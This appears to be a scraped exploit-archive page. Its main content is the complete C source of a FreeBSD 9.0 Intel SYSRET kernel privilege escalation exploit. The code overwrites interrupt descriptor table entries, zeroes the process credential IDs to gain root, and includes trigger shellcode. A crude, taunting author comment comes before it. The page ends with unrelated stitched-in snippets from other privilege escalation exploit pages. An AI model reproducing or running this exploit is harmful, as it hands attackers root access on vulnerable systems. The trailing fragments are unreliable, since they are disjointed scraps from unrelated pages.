FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

/*
 * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit
 * Author by CurcolHekerLink
 *
 * This exploit based on open source project, I can make it open source too. Right?
 *
 * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)
 *
 * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,
 * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam
 * if you would like next private exploit leakage, just mention @MamahhDedeh
 *
 * Some people may feel harmed when we release this exploit :))
 *
 * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>
#define TRIGGERSIZE 20
#define BOUNCESIZE 18

uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;

struct gate_descriptor * sidt()
{
        struct region_descriptor idt;
        asm ("sidt %0": "=m"(idt));
        return (struct gate_descriptor*)idt.rd_base;
}

u_long matchsym(char *symname)
{
        struct kld_sym_lookup ksym;
        ksym.version = sizeof (ksym);
        ksym.symname = symname;
        if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
                perror("kldsym");
                exit(1);
        }
        return ksym.symvalue;
}

void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
        struct gate_descriptor *ip;
        ip = idt + idx;
        ip->gd_looffset = func;
        ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
        ip->gd_ist = ist;
        ip->gd_xx = 0;
        ip->gd_type = typ;
        ip->gd_dpl = dpl;
        ip->gd_p = 1;
        ip->gd_hioffset = func>>16;
}

void payload()
{
        printf("[+] Woohoo!!!\n");
        exit(0);
}

void resetidt()
{
        struct thread *td;
        struct ucred *cred;
        struct gate_descriptor *idt = sidt();
        setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);

        asm ("mov %%gs:0, %0" : "=r"(td));

        cred = td->td_proc->p_ucred;
        cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
        cred->cr_groups[0] = 0;

        asm ("swapgs; sysretq;" :: "c"(payload));
}

void resolving()
{
        Xdivp = (uintptr_t)matchsym("Xdiv");
        Xdbgp = (uintptr_t)matchsym("Xdbg");
        Xbptp = (uintptr_t)matchsym("Xbpt");
        Xoflp = (uintptr_t)matchsym("Xofl");
        Xbndp = (uintptr_t)matchsym("Xbnd");
        Xillp = (uintptr_t)matchsym("Xill");
        Xdnap = (uintptr_t)matchsym("Xdna");
        Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");
        Xtssp = (uintptr_t)matchsym("Xtss");
        Xmissingp = (uintptr_t)matchsym("Xmissing");
        Xstkp = (uintptr_t)matchsym("Xstk");
        Xprotp = (uintptr_t)matchsym("Xprot");
        Xpagep = (uintptr_t)matchsym("Xpage");
        Xfpup = (uintptr_t)matchsym("Xfpu");
        Xalignp = (uintptr_t)matchsym("Xalign");
        Xmchkp = (uintptr_t)matchsym("Xmchk");
        Xxmmp = (uintptr_t)matchsym("Xxmm");
}

void trigger()
{
        printf("[+] Crotz...\n");
        uint64_t pagesize = getpagesize();
        uint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);
        mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
        if (mappedarea == MAP_FAILED) {
                perror("mmap (trigger)");
                exit(1);
        }

        char triggerpayload[] =
                "\xb8\x18\x00\x00\x00"
                "\x48\x89\xe3"
                "\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"
                "\x0f\x05";

        uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;
        memcpy(offset_addr, triggerpayload, TRIGGERSIZE);

        *(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
        printf("[+] Crotz...\n");
        char bouncepayload[] =
                "\x0f\x01\xf8"
                "\x48\x89\xdc"
                "\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"
                "\xff\xe0";

        uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));
        size_t bouncer_allocsize = pagesize;
        if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)
                bouncer_allocsize += pagesize;
        if (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
        {
                perror("mmap (bouncer)");
                exit(1);
        }
        memcpy(bouncer, bouncepayload, BOUNCESIZE);
        *(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;
        ((void (*)())offset_addr)();
}

int main(int argc, char *argv[])
{
        printf("[+] SYSRET FUCKUP!!\n");
        printf("[+] Start Engine...\n");
        resolving();
        printf("[+] Crotz...\n");
        trigger();
        return 0;
}

时间： 2024-11-03 03:39:04

FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit的相关文章

Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which enables arbitrary code execution within the kernel. The vulnerability affected all devices based on Qualcomm chipsets (that is, based on the "msm&quo

CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://hashcrack.org * * Usage: ./poc [file_path] * * where file_path is the file on which you want to set the sgid bit */ #define _GNU_SOURCE #include <s

[fw]Nvidia Linux Drive Privilege Escalation

/* Anonymous * * How to use: sudo rm -rf / * * greetz: djrbliss, kad, Ac1dB1tch3z, nVidia! * * Only complete fix patch nvidia drivers and redefine * IS_BLACKLISTED_REG_OFFSET: #define IS_BLACKLISTED_REG_OFFSET(nv, offset, length) 1 */ #define _GNU_SO

Acunetix WVS 10 - Local Privilege escalation

'''========================================================================Acunetix WVS 10 - from guest to Sytem (Local privilege escalation) CVE: CVE-2015-4027Author: (me) Daniele LinguaglossaAffected Product: Acunetix WVS 10Exploit: Local privilege

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员 http://zone.wooyun.org/content/17102 https://www.t00ls.net/thread-28706-1-1.html https://github.com/bidord/pykek ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an A

[转]Mac OS X local privilege escalation (IOBluetoothFamily)

Source:?http://joystick.artificialstudios.org/2014/10/mac-os-x-local-privilege-escalation.html Nowadays, exploitation of user-level vulnerabilities is becoming more and more difficult, because of the widespread diffusion of several protection methods

Windows XP SP1 Privilege Escalation

MS05-018 MS05-018 Works for Windows 2K SP3/4 | Windows XP SP1/2 Download ms05-018.exe: https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/windows%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/MS05018%E2%80%94C

【笔记】【原】ubuntu linux 12.04下Intel Math Kernel Library (MKL) 2013安装以及使用

实验环境: ubuntu 12.04 lts 安装软件: 仅记录2013版新版本类似 *安装与配置* 1. 注册收邮件获得激活码 2. 下载很大 3. 解压安装 ./install_sh 是否需要改权限我忘了 4. 跟着提示一步步走我没有改路劲 /opt/intel/ 里边如果有东西,就会无视不同名文件和目录并覆盖同名文件和目录 5. 配置 source /opt/intel/ composer_xe_2013.5.192 添加动态路径 /etc/ld.so.co

云计算的安全挑战—虚拟化安全

本文内容分为安全策略和虚拟化安全管理,重点讲介绍虚拟化安全 0x01 实施安全策略安全策略是有效的安全防御机制的基础,公司如果在没有创建安全策略.标准.指南.流程等基础的情况下,首先实现了技术解决方案,会导致安全控制机制目标不集中下图是安全策略的层析结构关系: 策略通常被认为是最高层的文档,而标准.流程和指南则是较低层次的组成元素,当然这并不是说较高层次的策略就更重要,而是说它应该在流程最初阶段创建,这样能对后面的细节元素有指导作用 1. 策略的高级管理声明:在所有策略最先创建的,是一种通